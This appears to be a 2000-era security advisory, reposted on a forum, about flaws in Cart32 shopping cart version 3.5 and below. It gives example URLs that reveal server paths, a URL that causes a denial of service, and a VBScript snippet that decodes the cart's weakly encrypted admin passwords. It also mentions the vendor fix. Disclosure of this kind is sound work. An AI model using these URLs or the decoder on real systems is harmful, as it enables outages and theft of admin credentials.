Vulnerable systems:
Cart32 version 3.5 and below
Immune systems:
Cart32 version 3.5a
The Cart32 shopping cart application is a Win32 executable that resides on a web server as cart32.exe and c32web.exe. There are a number of parameters that can be passed to these CGI applications that will reveal server information, namely physical paths to the web root, physical paths to the Windows directory, and physical paths to the program files directory. The following URLs demonstrate this problem:
���
http://www.example.com/cgi-bin/cart32.exe/error
���
http://www.example.com/cgi-bin/c32web.exe/ShowAdminDir
���
http://www.example.com/cgi-bin/c32web.exe/CheckError?error=53
Cart32 is also vulnerable to a denial of service attack that will raise the processor usage to 100% by entering the following URL:
���
http://www.example.com/cgi-bin/c32web.exe/ShowProgress
Cart32 has issued an updated version 3.5a that addresses most of these issues and has an updated version available at their web site (
www.cart32.com).
Another problem is that many people often (as set up by their ISP or web hosting company) put the cart32.ini file in the same directory as cart32.exe and c32web.exe. If that file is in that directory and is readable, then much more information can be revealed about the server, especially if the Debug section exists in that file. Cart32.ini contains very lightly encrypted admin password and server configuration information.
The Debug section can contain plaintext passwords, server environment variables, and other sensitive information. The issue of leaving the cart32.ini file has been publicly discussed in the past and Cart32 does have a KB article about this issue but it is still a very common problem, as any search engine will reveal. This issue does need to be readdressed, especially considering the weakness of their encryption.
On November 6, 2000 Colin Hart and Cart32 issued a joint advisory addressing the issue of the weak encryption. They also stated that they would not be releasing the actual algorithm. Because Xato does not agree with the concept of security through obscurity, Xato have put together this snippet of VBScript code to demonstrate how a password can be unencrypted:
Cart32Decode = Chr(Asc(Mid(sPass, 8)) - 12) & _
�������Chr(Asc(Mid(sPass, 5)) - 8) & _
�������Chr(Asc(Mid(sPass, 3)) - 16) & _
�������Chr(Asc(Mid(sPass, 15)) - 15) & _
�������Chr(Asc(Mid(sPass, 9)) - 9) & _
�������Chr(Asc(Mid(sPass, 1)) - 12) & _
�������Chr(Asc(Mid(sPass, 4)) - 3) & _
�������Chr(Asc(Mid(sPass, 11)) - 5) & _
�������Chr(Asc(Mid(sPass, 13)) - 11) & _
�������Chr(Asc(Mid(sPass, 6)) - 5) & _
�������Chr(Asc(Mid(sPass, 2)) - 1) & _
�������Chr(Asc(Mid(sPass, 2)) - 1) & _
�������Chr(Asc(Mid(sPass, 14)) - 13) & _
�������Chr(Asc(Mid(sPass, 12)) - 10) & _
�������Chr(Asc(Mid(sPass, 10)) - 6) & _
�������Chr(Asc(Mid(sPass, 7)) - 8)
As mentioned in Colin Hart's advisory, version 3.5a will fix this problem.
Solution:
Cart32 was first notified of these problems on August 28, 2000. Cart32 has issued a version 3.5a release that addresses some of these issues but not all of them. If using Cart32 you should carefully read the knowledge base articles available on their web site.
[
Ovu poruku je menjao MoHicAn dana 07-27-2001 u 04:47 PM GMT]